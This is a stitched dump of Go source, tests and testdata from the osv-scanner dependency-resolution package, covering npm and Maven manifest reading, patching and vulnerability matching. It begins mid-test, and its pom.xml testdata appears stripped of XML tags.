"org.profile", ArtifactID: "abc", Version: "1.2.3"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.profile", ArtifactID: "def", Version: "${def.version}"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.import", ArtifactID: "xyz", Version: "6.6.6", Scope: "import", Type: "pom"}, Origin: "profile@profile-two@management", }, { Dependency: maven.Dependency{GroupID: "org.dep", ArtifactID: "plugin-dep", Version: "2.3.3"}, Origin: "plugin@org.plugin:plugin", }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "ddd", Version: "1.2.3"}, Origin: "parent@" + parentPath, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "aaa", Version: "${aaa.version}"}, Origin: "parent@" + parentPath + "@management", }, }, } want := map[string]MavenPatches{ "": { DependencyPatches: MavenDependencyPatches{ "": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.0.2", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "another-property", Type: "jar", }, NewRequire: "1.1.0", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "property-no-update", Type: "jar", }, NewRequire: "2.0.0", }: true, }, "management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "xyz", Type: "jar", }, NewRequire: "2.0.1", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "no-version", Type: "jar", }, NewRequire: "2.0.1", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "override", Type: "jar", }, NewRequire: "2.0.0", }: false, }, "profile@profile-one": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.profile", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.2.4", }: true, }, "profile@profile-two@management": map[MavenPatch]bool{ { 
DependencyKey: maven.DependencyKey{ GroupID: "org.import", ArtifactID: "xyz", Type: "pom", }, NewRequire: "6.7.0", }: true, }, "plugin@org.plugin:plugin": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.dep", ArtifactID: "plugin-dep", Type: "jar", }, NewRequire: "2.3.4", }: true, }, "parent": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.parent", ArtifactID: "parent-pom", Type: "pom", }, NewRequire: "1.2.0", }: true, }, }, PropertyPatches: MavenPropertyPatches{ "": { "property.version": "1.0.1", }, "profile@profile-one": { "def.version": "2.3.5", }, }, }, parentPath: { DependencyPatches: MavenDependencyPatches{ "": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "ddd", Type: "jar", }, NewRequire: "1.3.0", }: true, }, }, PropertyPatches: MavenPropertyPatches{ "": { "aaa.version": "1.2.0", }, }, }, } allPatches, err := buildPatches(patches, specific) if err != nil { t.Fatalf("failed to build patches: %v", err) } if diff := cmp.Diff(want, allPatches); diff != "" { t.Errorf("result patches mismatch (-want +got):\n%s", diff) } } func Test_generatePropertyPatches(t *testing.T) { t.Parallel() tests := []struct { s1 string s2 string possible bool patches map[string]string }{ {"${version}", "1.2.3", true, map[string]string{"version": "1.2.3"}}, {"${major}.2.3", "1.2.3", true, map[string]string{"major": "1"}}, {"1.${minor}.3", "1.2.3", true, map[string]string{"minor": "2"}}, {"1.2.${patch}", "1.2.3", true, map[string]string{"patch": "3"}}, {"${major}.${minor}.${patch}", "1.2.3", true, map[string]string{"major": "1", "minor": "2", "patch": "3"}}, {"${major}.2.3", "2.0.0", false, map[string]string{}}, {"1.${minor}.3", "2.0.0", false, map[string]string{}}, } for _, tt := range tests { patches, ok := generatePropertyPatches(tt.s1, tt.s2) if ok != tt.possible || !reflect.DeepEqual(patches, tt.patches) { t.Errorf("generatePropertyPatches(%s, %s): got %v %v, want %v %v", tt.s1, tt.s2, 
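// Read parses the package.json in f into a Manifest.
//
// Every package.json matched by the "workspaces" patterns is read recursively
// and stored in LocalManifests. Each workspace is also added to the root
// requirements under the name "<name>:workspace". When a package is declared
// in more than one dependency section, the optionalDependencies entry replaces
// the dependencies entry and the devDependencies entry replaces both.
//
// The manifest being read may come from a project that is not trusted. Its
// workspace patterns decide which further files are opened (see the note in
// the body).
func (rw NpmReadWriter) Read(f depfile.DepFile) (Manifest, error) {
	dec := json.NewDecoder(f)
	var packagejson PackageJSON
	if err := dec.Decode(&packagejson); err != nil {
		return Manifest{}, err
	}

	// Create the root node.
	manif := newManifest()
	manif.FilePath = f.Path()
	manif.Root = resolve.Version{
		VersionKey: resolve.VersionKey{
			PackageKey: resolve.PackageKey{
				Name:   packagejson.Name,
				System: resolve.NPM,
			},
			Version:     packagejson.Version,
			VersionType: resolve.Concrete,
		}}

	// Find all package.json files in the workspaces & parse those too.
	// NOTE(review): the patterns are taken verbatim from package.json and are
	// joined onto the manifest directory before globbing, so a pattern with
	// ".." segments can match a package.json outside the project directory.
	// Whether f.Open confines the path is not visible here - confirm, or
	// reject matches that are not under the manifest directory.
	var workspaces []string
	for _, pattern := range packagejson.Workspaces {
		match, err := filepath.Glob(filepath.Join(filepath.Dir(f.Path()), pattern, "package.json"))
		if err != nil {
			return Manifest{}, err
		}
		workspaces = append(workspaces, match...)
	}

	// workspaces seem to be evaluated in sorted path order
	slices.Sort(workspaces)
	workspaceNames := make(map[string]struct{})
	for _, path := range workspaces {
		wsFile, err := f.Open(path)
		if err != nil {
			return Manifest{}, err
		}
		// TODO: Workspaces can't have workspaces of their own.
		// Avoid attempting to resolve them recursively.
		m, err := rw.Read(wsFile)
		// Close as soon as the workspace is parsed. A defer inside this loop
		// would keep every workspace file open until Read returns, and the
		// number of matches is controlled by the manifest's glob patterns.
		wsFile.Close()
		if err != nil {
			return Manifest{}, err
		}
		manif.LocalManifests = append(manif.LocalManifests, m)
		workspaceNames[m.Root.Name] = struct{}{}
	}

	isWorkspace := func(req resolve.RequirementVersion) bool {
		if req.Type.HasAttr(dep.KnownAs) {
			// "alias": "npm:pkg@*" seems to always take the real 'pkg',
			// even if there's a workspace with the same name.
			return false
		}
		_, ok := workspaceNames[req.Name]

		return ok
	}

	// upsert replaces the requirement that has the same PackageKey as req,
	// or appends req when there is none.
	upsert := func(req resolve.RequirementVersion) {
		idx := slices.IndexFunc(manif.Requirements, func(imp resolve.RequirementVersion) bool {
			return imp.PackageKey == req.PackageKey
		})
		if idx != -1 {
			manif.Requirements[idx] = req
		} else {
			manif.Requirements = append(manif.Requirements, req)
		}
	}

	workspaceReqVers := make(map[resolve.PackageKey]resolve.RequirementVersion)

	// empirically, the dev version takes precedence over optional, which takes precedence over regular, if they conflict.
	for pkg, ver := range packagejson.Dependencies {
		req := rw.makeNPMReqVer(pkg, ver)
		if isWorkspace(req) {
			// workspaces seem to always be evaluated separately
			workspaceReqVers[req.PackageKey] = req
			continue
		}
		manif.Requirements = append(manif.Requirements, req)
	}

	for pkg, ver := range packagejson.OptionalDependencies {
		req := rw.makeNPMReqVer(pkg, ver)
		req.Type.AddAttr(dep.Opt, "")
		if isWorkspace(req) {
			// workspaces seem to always be evaluated separately
			workspaceReqVers[req.PackageKey] = req
			continue
		}
		upsert(req)
		manif.Groups[npmRequirementKey(req)] = []string{"optional"}
	}

	for pkg, ver := range packagejson.DevDependencies {
		req := rw.makeNPMReqVer(pkg, ver)
		if isWorkspace(req) {
			// workspaces seem to always be evaluated separately
			workspaceReqVers[req.PackageKey] = req
			continue
		}
		// In newer versions of npm, having a package in both the `dependencies` and `devDependencies`
		// makes it treated as ONLY a devDependency (using the devDependency version)
		// npm v6 and below seems to do the opposite and there's no easy way of seeing the npm version :/
		upsert(req)
		manif.Groups[npmRequirementKey(req)] = []string{"dev"}
	}

	resolve.SortDependencies(manif.Requirements)

	// resolve workspaces after regular requirements
	for i, m := range manif.LocalManifests {
		imp, ok := workspaceReqVers[m.Root.PackageKey]
		if !ok { // The workspace isn't directly used by the root package, add it as a 'requirement' anyway so it's resolved
			imp = resolve.RequirementVersion{
				Type: dep.NewType(),
				VersionKey: resolve.VersionKey{
					PackageKey:  m.Root.PackageKey,
					Version:     "*", // use the 'any' specifier so we always match the sub-package version
					VersionType: resolve.Requirement,
				},
			}
		}
		// Add an extra identifier to the workspace package names so name collisions don't overwrite indirect dependencies
		imp.Name += ":workspace"
		manif.LocalManifests[i].Root.Name = imp.Name
		manif.Requirements = append(manif.Requirements, imp)
		// replace the workspace's sibling requirements
		for j, req := range m.Requirements {
			if isWorkspace(req) {
				manif.LocalManifests[i].Requirements[j].Name = req.Name + ":workspace"
				reqKey := npmRequirementKey(req)
				if g, ok := m.Groups[reqKey]; ok {
					newKey := npmRequirementKey(manif.LocalManifests[i].Requirements[j])
					manif.LocalManifests[i].Groups[newKey] = g
					delete(manif.LocalManifests[i].Groups, reqKey)
				}
			}
		}
	}

	return manif, nil
}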
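// Write copies the package.json read from r to w with the requirement of every
// dependency in patch.Deps changed from OrigRequire to NewRequire.
//
// The file is edited as text with gjson/sjson, so formatting and key order are
// kept. For an aliased dependency (one with the KnownAs attribute) the key is
// the alias and the values are rebuilt as "npm:<name>@<version>".
//
// An error is returned when the version found in package.json is not the
// expected original version, and when reading, updating or writing fails.
func (NpmReadWriter) Write(r depfile.DepFile, w io.Writer, patch Patch) error {
	// Read the whole package.json into a string so we can use sjson to write in-place.
	var buf strings.Builder
	if _, err := io.Copy(&buf, r); err != nil {
		return err
	}
	manif := buf.String()

	// A dependency name becomes one component of a gjson/sjson path, where
	// '.', '*' and '?' are syntax. Unescaped, a name such as "socket.io" is
	// looked up as nested keys, is never found, and the fix is skipped while
	// Write still reports success. The names come from the manifest, so they
	// are escaped rather than trusted.
	// NOTE(review): other gjson operators ('|', '#') are not valid in npm
	// package names and are not escaped here.
	pathEscaper := strings.NewReplacer(`\`, `\\`, `.`, `\.`, `*`, `\*`, `?`, `\?`)

	// Don't know what kind of dependency this is, so check them all.
	// Check them in dev -> optional -> prod because that's the order npm seems to use when they conflict.
	// Check devDependency first because npm>=7 uses only the devDependency if it exists in both.
	sections := [...]string{"devDependencies", "optionalDependencies", "dependencies"}

	for _, changedDep := range patch.Deps {
		name := changedDep.Pkg.Name
		origVer := changedDep.OrigRequire
		newVer := changedDep.NewRequire
		if knownAs, ok := changedDep.Type.GetAttr(dep.KnownAs); ok {
			// reconstruct alias versioning
			origVer = fmt.Sprintf("npm:%s@%s", name, origVer)
			newVer = fmt.Sprintf("npm:%s@%s", name, newVer)
			name = knownAs
		}

		key := pathEscaper.Replace(name)
		alreadyMatched := false
		for _, section := range sections {
			depStr := section + "." + key
			res := gjson.Get(manif, depStr)
			if !res.Exists() {
				continue
			}
			if res.Str != origVer {
				if alreadyMatched {
					// A higher-precedence section was already patched; leave
					// the remaining sections of this dependency untouched.
					break
				}
				// Report the mismatch to the caller instead of panicking on
				// manifest content.
				return fmt.Errorf("original dependency version does not match what is in package.json: %s in %s", name, section)
			}
			alreadyMatched = true

			updated, err := sjson.Set(manif, depStr, newVer)
			if err != nil {
				return err
			}
			manif = updated
		}
	}

	// Write out modified package.json
	_, err := io.WriteString(w, manif)

	return err
}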
System: resolve.NPM, }, }, Type: typ, }) } func TestNpmRead(t *testing.T) { t.Parallel() df, err := depfile.OpenLocalDepFile("./testdata/package.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := manifest.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if !strings.HasSuffix(got.FilePath, "package.json") { t.Errorf("manifest file path %v does not have package.json", got.FilePath) } got.FilePath = "" want := manifest.Manifest{ Root: resolve.Version{ VersionKey: npmVK(t, "npm-manifest", "1.0.0", resolve.Concrete), }, // npm dependencies should resolve in alphabetical order, regardless of type Requirements: []resolve.RequirementVersion{ // TODO: @babel/core peerDependency currently not resolved { Type: aliasType(t, "cliui"), // sorts on aliased name, not real package name VersionKey: npmVK(t, "@isaacs/cliui", "^8.0.2", resolve.Requirement), }, { // Type: dep.NewType(dep.Dev), devDependencies treated as prod to make resolution work VersionKey: npmVK(t, "eslint", "^8.57.0", resolve.Requirement), }, { Type: dep.NewType(dep.Opt), VersionKey: npmVK(t, "glob", "^10.3.10", resolve.Requirement), }, { VersionKey: npmVK(t, "jquery", "latest", resolve.Requirement), }, { VersionKey: npmVK(t, "lodash", "4.17.17", resolve.Requirement), }, { VersionKey: npmVK(t, "string-width", "^5.1.2", resolve.Requirement), }, { Type: aliasType(t, "string-width-aliased"), VersionKey: npmVK(t, "string-width", "^4.2.3", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{ npmReqKey(t, "eslint", ""): {"dev"}, npmReqKey(t, "glob", ""): {"optional"}, }, } if !reflect.DeepEqual(got, want) { t.Errorf("npm manifest mismatch:\ngot %v\nwant %v\n", got, want) } } func TestNpmWorkspaceRead(t *testing.T) { t.Parallel() df, err := depfile.OpenLocalDepFile("./testdata/npm-workspaces/package.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := 
manifest.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if !strings.HasSuffix(got.FilePath, "package.json") { t.Errorf("manifest file path %v does not have package.json", got.FilePath) } got.FilePath = "" for i, local := range got.LocalManifests { if !strings.HasSuffix(local.FilePath, "package.json") { t.Errorf("local manifest file path %v does not have package.json", local.FilePath) } got.LocalManifests[i].FilePath = "" } want := manifest.Manifest{ Root: resolve.Version{ VersionKey: npmVK(t, "npm-workspace-test", "1.0.0", resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ // root dependencies always before workspace { Type: aliasType(t, "jquery-real"), VersionKey: npmVK(t, "jquery", "^3.7.1", resolve.Requirement), }, // workspaces in path order { VersionKey: npmVK(t, "jquery:workspace", "^3.7.1", resolve.Requirement), }, { VersionKey: npmVK(t, "@workspace/ugh:workspace", "*", resolve.Requirement), }, { VersionKey: npmVK(t, "z-z-z:workspace", "*", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{ npmReqKey(t, "jquery", "jquery-real"): {"dev"}, // excludes workspace dev dependency }, LocalManifests: []manifest.Manifest{ { Root: resolve.Version{ VersionKey: npmVK(t, "jquery:workspace", "3.7.1", resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ { VersionKey: npmVK(t, "semver", "^7.6.0", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{}, }, { Root: resolve.Version{ VersionKey: npmVK(t, "@workspace/ugh:workspace", "0.0.1", resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ { VersionKey: npmVK(t, "jquery:workspace", "*", resolve.Requirement), }, { VersionKey: npmVK(t, "semver", "^6.3.1", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{ npmReqKey(t, "jquery:workspace", ""): {"dev"}, npmReqKey(t, "semver", ""): {"dev"}, }, }, { Root: resolve.Version{ VersionKey: npmVK(t, "z-z-z:workspace", "1.0.0", 
resolve.Concrete), }, Requirements: []resolve.RequirementVersion{ { VersionKey: npmVK(t, "@workspace/ugh:workspace", "*", resolve.Requirement), }, { VersionKey: npmVK(t, "semver", "^5.7.2", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{}, }, }, } if !reflect.DeepEqual(got, want) { t.Errorf("npm manifest mismatch:\ngot %v\nwant %v\n", got, want) } } func TestNpmWrite(t *testing.T) { t.Parallel() df, err := depfile.OpenLocalDepFile("./testdata/package.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() changes := manifest.Patch{ Deps: []manifest.DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "lodash", }, OrigRequire: "4.17.17", NewRequire: "^4.17.21", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "eslint", }, OrigRequire: "^8.57.0", NewRequire: "*", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "glob", }, OrigRequire: "^10.3.10", NewRequire: "^1.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "jquery", }, OrigRequire: "latest", NewRequire: "~0.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "@isaacs/cliui", }, Type: aliasType(t, "cliui"), OrigRequire: "^8.0.2", NewRequire: "^9.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "string-width", }, OrigRequire: "^5.1.2", NewRequire: "^7.1.0", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "string-width", }, Type: aliasType(t, "string-width-aliased"), OrigRequire: "^4.2.3", NewRequire: "^6.1.0", }, }, } buf := new(bytes.Buffer) npmRW := manifest.NpmReadWriter{} if err := npmRW.Write(df, buf, changes); err != nil { t.Fatalf("unable to update npm package.json: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, buf.String()) } ================================================ FILE: internal/resolution/manifest/testdata/maven/my-app/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true 
================================================ FILE: internal/resolution/manifest/testdata/maven/my-app/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com Don't escape. Escape "this". Ol' Cap'n Napkins Ol" Cap"n Napkins org.parent parent-pom 1.1.1 ../parent/pom.xml UTF-8 1.7 1.7 4.12 ../bin junit junit ${junit.version} test org.example abc 1.0.1 org.example no-version org.example exclusions 1.0.0 org.exclude exclude org.example xyz 2.0.0 org.example no-version 2.0.0 org.import import 1.0.0 pom import profile-one true 2.3.4 org.profile abc 1.2.3 org.profile def ${def.version} profile-two org.import xyz 6.6.6 import pom org.plugin plugin 1.0.0 org.dep plugin-dep 2.3.3 ================================================ FILE: internal/resolution/manifest/testdata/maven/no-dependency-management.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com org.parent parent-pom 1.1.1 junit junit 4.12 ================================================ FILE: internal/resolution/manifest/testdata/maven/parent/grandparent/mismatch.xml ================================================ 4.0.0 org.upstream wrong-parent 1.1.1 pom ================================================ FILE: internal/resolution/manifest/testdata/maven/parent/grandparent/pom.xml ================================================ 4.0.0 org.grandparent grandparent-pom 1.1.1 my-app http://www.example.com pom org.upstream parent-pom 1.2.3 ./mismatch.xml ================================================ FILE: internal/resolution/manifest/testdata/maven/parent/pom.xml ================================================ 4.0.0 org.parent parent-pom 1.1.1 my-app http://www.example.com pom org.grandparent grandparent-pom 1.1.1 ./grandparent 1.1.1 org.example ddd 1.2.3 org.example aaa ${aaa.version} ================================================ FILE: 
internal/resolution/manifest/testdata/npm-workspaces/package.json ================================================ { "name": "npm-workspace-test", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "workspaces": [ "z", "ws/*" ], "devDependencies": { "jquery": "^3.7.1", "jquery-real": "npm:jquery@^3.7.1" }, "dependencies": { "@workspace/ugh": "*" } } ================================================ FILE: internal/resolution/manifest/testdata/npm-workspaces/ws/jquery/package.json ================================================ { "name": "jquery", "version": "3.7.1", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "semver": "^7.6.0" } } ================================================ FILE: internal/resolution/manifest/testdata/npm-workspaces/ws/ugh/package.json ================================================ { "name": "@workspace/ugh", "version": "0.0.1", "description": "", "main": "index.js", "devDependencies": { "jquery": "*", "semver": "^6.3.1" }, "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC" } ================================================ FILE: internal/resolution/manifest/testdata/npm-workspaces/z/package.json ================================================ { "name": "z-z-z", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "@workspace/ugh": "*", "semver": "^5.7.2" } } ================================================ FILE: internal/resolution/manifest/testdata/package.json ================================================ { "name": "npm-manifest", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test 
specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "cliui": "npm:@isaacs/cliui@^8.0.2", "jquery": "latest", "lodash": "4.17.17", "string-width": "^5.1.2", "string-width-aliased": "npm:string-width@^4.2.3" }, "devDependencies": { "eslint": "^8.57.0" }, "optionalDependencies": { "glob": "^10.3.10" }, "peerDependencies": { "@babel/core": "^7.24.0" } } ================================================ FILE: internal/resolution/manifest/testmain_test.go ================================================ package manifest_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/resolution/resolve.go ================================================ // Package resolution provides functionality for resolving dependencies and vulnerabilities. package resolution import ( "cmp" "context" "errors" "fmt" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/resolve/maven" "deps.dev/util/resolve/npm" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/manifest" mavenutil "github.com/google/osv-scanner/v2/internal/utility/maven" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type Vulnerability struct { OSV *osvschema.Vulnerability DevOnly bool // Subgraphs are the collections of nodes and edges that reach the vulnerable node. // Subgraphs all contain the root node (NodeID 0) with no incoming edges (Parents), // and the vulnerable node (NodeID DependencySubgraph.Dependency) with no outgoing edges (Children). 
Subgraphs []*DependencySubgraph
}

// IsDirect reports whether at least one of the vulnerability's subgraphs has
// Distance 1 recorded on its node 0 (the root node of the subgraph).
func (rv Vulnerability) IsDirect() bool {
	return slices.ContainsFunc(rv.Subgraphs, func(sg *DependencySubgraph) bool {
		return sg.Nodes[0].Distance == 1
	})
}

// Result holds a resolved manifest: the manifest itself, the resolved graph,
// and the vulnerabilities found in it, both filtered (Vulns) and as first
// computed (UnfilteredVulns).
type Result struct {
	Manifest        manifest.Manifest
	Graph           *resolve.Graph
	Vulns           []Vulnerability
	UnfilteredVulns []Vulnerability
}

// NodeError pairs a resolution error with the ID of the graph node it was recorded on.
type NodeError struct {
	NodeID resolve.NodeID
	Error  resolve.NodeError
}

// Errors flattens the per-node errors of the resolved graph into one slice,
// in node order. It returns nil when no node carries an error.
func (res *Result) Errors() []NodeError {
	var collected []NodeError
	for id := range res.Graph.Nodes {
		for _, nodeErr := range res.Graph.Nodes[id].Errors {
			collected = append(collected, NodeError{NodeID: resolve.NodeID(id), Error: nodeErr})
		}
	}

	return collected
}

// getResolver returns the resolver for sys backed by cl.
// Only npm and Maven have a resolver; any other system is an error.
func getResolver(sys resolve.System, cl resolve.Client) (resolve.Resolver, error) {
	if sys == resolve.NPM {
		return npm.NewResolver(cl), nil
	}
	if sys == resolve.Maven {
		return maven.NewResolver(cl), nil
	}

	return nil, fmt.Errorf("no resolver for ecosystem %v", sys)
}

// ResolveOpts are the options accepted by Resolve.
type ResolveOpts struct {
	MavenManagement bool // whether to include unresolved dependencyManagement dependencies in resolved graph.
}

func Resolve(ctx context.Context, cl client.ResolutionClient, m manifest.Manifest, opts ResolveOpts) (*Result, error) {
	c := client.NewOverrideClient(cl.DependencyClient)
	c.AddVersion(m.Root, m.Requirements)
	for _, loc := range m.LocalManifests {
		c.AddVersion(loc.Root, loc.Requirements)
		// TODO: may need to do this recursively
	}
	cl.DependencyClient = c

	r, err := getResolver(m.System(), cl.DependencyClient)
	if err != nil {
		return nil, err
	}

	graph, err := r.Resolve(ctx, m.Root.VersionKey)
	if err != nil {
		return nil, err
	}

	graph, err = resolvePostProcess(ctx, cl, m, opts, graph)
	if err != nil {
		return nil, err
	}

	if len(graph.Error) > 0 {
		return nil, errors.New(graph.Error)
	}

	result := &Result{
		Manifest: m.Clone(),
		Graph:    graph,
	}

	if err := result.computeVulns(ctx, cl); err != nil {
		return nil, err
	}

	// Make a copy of the found vulns, as `Vulns` may be filtered according to specified criteria.
result.UnfilteredVulns = slices.Clone(result.Vulns) return result, nil } func resolvePostProcess(ctx context.Context, cl client.ResolutionClient, m manifest.Manifest, opts ResolveOpts, graph *resolve.Graph) (*resolve.Graph, error) { if m.System() == resolve.Maven && opts.MavenManagement { // Add a node & edge for each dependency in dependencyManagement that doesn't already appear in the resolved graph manifestSpecific, ok := m.EcosystemSpecific.(manifest.MavenManifestSpecific) if !ok { return graph, errors.New("invalid MavenManifestSpecific data") } // Search through OriginalRequirements management dependencies in this pom only (not parents). // TODO: Possibly refactor RequirementsForUpdates for this purpose. for _, req := range manifestSpecific.OriginalRequirements { if req.Origin != mavenutil.OriginManagement { // TODO: also check management in activated profiles and dependencies in inactive profiles. continue } // Unique identifier for this package. reqKey := manifest.MakeRequirementKey(resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: req.Name(), }, VersionType: resolve.Requirement, Version: string(req.Version), }, Type: resolve.MavenDepType(req.Dependency, req.Origin), }) // Find the current version of the dependencyManagement dependency, after property interpolation & changes from remediation. idx := slices.IndexFunc(m.Requirements, func(rv resolve.RequirementVersion) bool { if origin, _ := rv.Type.GetAttr(dep.MavenDependencyOrigin); origin != mavenutil.OriginManagement { return false } return reqKey == manifest.MakeRequirementKey(rv) }) if idx == -1 { // Ideally, this would be an error, but there a few known instances where this lookup fails: // 1. The artifact name contain a property (properties aren't substituted in OriginalRequirements, but are in Manifest.Requirements) // 2. Missing properties (due to e.g. 
un-activated profiles) cause the dependency to be invalid, and therefore excluded from Manifest.Requirements. // Ignore these dependencies in these cases so that we can still remediation vulns in the other packages. // TODO: logging continue } rv := m.Requirements[idx] // See if the package is already in the resolved graph. // Check the edges so we can make sure the ArtifactTypes and Classifiers match. if !slices.ContainsFunc(graph.Edges, func(e resolve.Edge) bool { return reqKey == manifest.MakeRequirementKey(resolve.RequirementVersion{ VersionKey: graph.Nodes[e.To].Version, Type: e.Type, }) }) { // Management dependency not in graph - create the node. // Find the version the management requirement would resolve to. // First assume it's a soft requirement. vk := rv.VersionKey vk.VersionType = resolve.Concrete if _, err := cl.Version(ctx, vk); err != nil { // Not a soft requirement - try to find a match. vk.VersionType = resolve.Requirement vks, err := cl.MatchingVersions(ctx, vk) if err != nil || len(vks) == 0 { err = graph.AddError(0, vk, fmt.Sprintf("could not find a version that satisfies requirement %s for package %s", vk.Version, vk.Name)) if err != nil { return nil, err } continue } vk = vks[len(vks)-1].VersionKey } // Add the node & and edge from the root. nID := graph.AddNode(vk) if err := graph.AddEdge(0, nID, rv.Version, rv.Type.Clone()); err != nil { return nil, err } } } } return graph, nil } // computeVulns scans for vulnerabilities in a resolved graph and populates res.Vulns func (res *Result) computeVulns(ctx context.Context, cl client.ResolutionClient) error { nodeVulns, err := cl.MatchVulnerabilities(ctx, client.GraphToInventory(res.Graph)) if err != nil { return err } // GraphToInventory/MatchVulnerabilities excludes the root node of the graph. // Prepend an element to nodeVulns so that the indices line up with graph.Nodes[i] <=> nodeVulns[i] nodeVulns = append([][]*osvschema.Vulnerability{nil}, nodeVulns...) 
// Find all dependency paths to the vulnerable dependencies var vulnerableNodes []resolve.NodeID vulnInfo := make(map[string]*osvschema.Vulnerability) for i, vulns := range nodeVulns { if len(vulns) > 0 { vulnerableNodes = append(vulnerableNodes, resolve.NodeID(i)) } for _, vuln := range vulns { vulnInfo[vuln.GetId()] = vuln } } nodeSubgraphs := ComputeSubgraphs(res.Graph, vulnerableNodes) vulnSubgraphs := make(map[string][]*DependencySubgraph) for i, nID := range vulnerableNodes { for _, vuln := range nodeVulns[nID] { vulnSubgraphs[vuln.GetId()] = append(vulnSubgraphs[vuln.GetId()], nodeSubgraphs[i]) } } // construct the resolution.Vulnerability // TODO: This constructs a single resolution.Vulnerability per vulnerability ID. // The scan action treats vulns with the same ID but affecting different versions of a package as distinct. // TODO: Combine aliased IDs for id, vuln := range vulnInfo { rv := Vulnerability{OSV: vuln, DevOnly: true} rv.Subgraphs = vulnSubgraphs[id] rv.DevOnly = !slices.ContainsFunc(rv.Subgraphs, func(ds *DependencySubgraph) bool { return !ds.IsDevOnly(res.Manifest.Groups) }) res.Vulns = append(res.Vulns, rv) } return nil } // FilterVulns populates Vulns with the UnfilteredVulns that satisfy matchFn func (res *Result) FilterVulns(matchFn func(Vulnerability) bool) { var matchedVulns []Vulnerability for _, v := range res.UnfilteredVulns { if matchFn(v) { matchedVulns = append(matchedVulns, v) } } res.Vulns = matchedVulns } type Difference struct { manifest.Patch Original *Result New *Result RemovedVulns []Vulnerability AddedVulns []Vulnerability } func (res *Result) CalculateDiff(other *Result) Difference { diff := Difference{ Original: res, New: other, Patch: manifest.Patch{Manifest: &res.Manifest}, } // Find the changed requirements and the versions they resolve to for i, oldReq := range res.Manifest.Requirements { // assuming these are in the same order and none are added/removed newReq := other.Manifest.Requirements[i] if oldReq.Version == 
newReq.Version { continue } // Find the node in the graph to find which actual version it resolved to var oldResolved string for _, e := range res.Graph.Edges { toNode := res.Graph.Nodes[e.To] if e.From == 0 && toNode.Version.PackageKey == oldReq.PackageKey { oldResolved = toNode.Version.Version break } } var newResolved string for _, e := range other.Graph.Edges { toNode := other.Graph.Nodes[e.To] if e.From == 0 && toNode.Version.PackageKey == newReq.PackageKey { newResolved = toNode.Version.Version break } } diff.Deps = append(diff.Deps, manifest.DependencyPatch{ Pkg: oldReq.PackageKey, Type: oldReq.Type.Clone(), OrigRequire: oldReq.Version, OrigResolved: oldResolved, NewRequire: newReq.Version, NewResolved: newResolved, }) } // Compute differences in present vulnerabilities. // Currently this relies on vulnerability IDs being unique in the Vulns slice. oldVulns := make(map[string]int, len(res.Vulns)) for i, v := range res.Vulns { oldVulns[v.OSV.GetId()] = i } for _, v := range other.Vulns { if _, ok := oldVulns[v.OSV.GetId()]; ok { // The vuln already existed. 